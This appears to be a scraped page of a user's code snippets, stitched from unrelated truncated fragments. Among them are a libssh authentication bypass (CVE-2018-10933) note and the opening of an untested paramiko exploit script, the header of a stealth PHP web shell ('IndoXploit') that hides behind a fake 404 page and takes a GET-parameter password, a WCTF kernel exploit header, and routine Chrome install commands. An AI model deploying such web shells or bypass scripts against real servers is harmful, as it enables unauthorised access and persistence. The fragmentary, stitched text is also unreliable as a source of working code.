f0r34chb3t4

Libssh authentication bypass vulnerability (CVE-2018-10933)

An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug.

	import sys


	# Loading dns module.
	try:
	import dns.resolver
	resolver = dns.resolver.Resolver()
	resolver.timeout = 0.10
	resolver.lifetime = 0.10
	except:

	<?php
	/*
	* # IndoXploit v3 Web Shell (Stealth Version)
	* # What was involved?
	* - Uses dynamic 404 page from the server to make the web shell looks like it was deleted
	* - Login method is by using GET parameters, (example: 'http://example.com/idx_s.php?passwd=password_saia_kaka')
	* # Important Bookmark
	* - Password configuration at line 27
	* - login_shell() function at line 40-52
	* - Login validation at line 57-64

	def extract_form_fields(self, soup):
	"Turn a BeautifulSoup form in to a dict of fields and default values"
	fields = {}
	for input in soup.findAll('input'):
	# ignore submit/image with no name attribute
	if input['type'] in ('submit', 'image') and not input.has_key('name'):
	continue

	# single element nome/value fields
	if input['type'] in ('text', 'hidden', 'password', 'submit', 'image'):

	// WCTF 2018 "searchme" task exploit
	//
	// Author: Mateusz "j00ru" Jurczyk
	// Date: 6 July 2018
	// Tested on: Windows 10 1803 (10.0.17134.165)
	//
	// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
	#include <Windows.h>
	#include <winternl.h>
	#include <ntstatus.h>


	wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub \| sudo apt-key add -

	sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'

	sudo apt-get update

	sudo apt-get install google-chrome-stable

	#!/usr/bin/env python
	# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
	# untested CVE-2018-10933

	import sys, paramiko
	import logging

	username = sys.argv[1]
	hostname = sys.argv[2]
	command = sys.argv[3]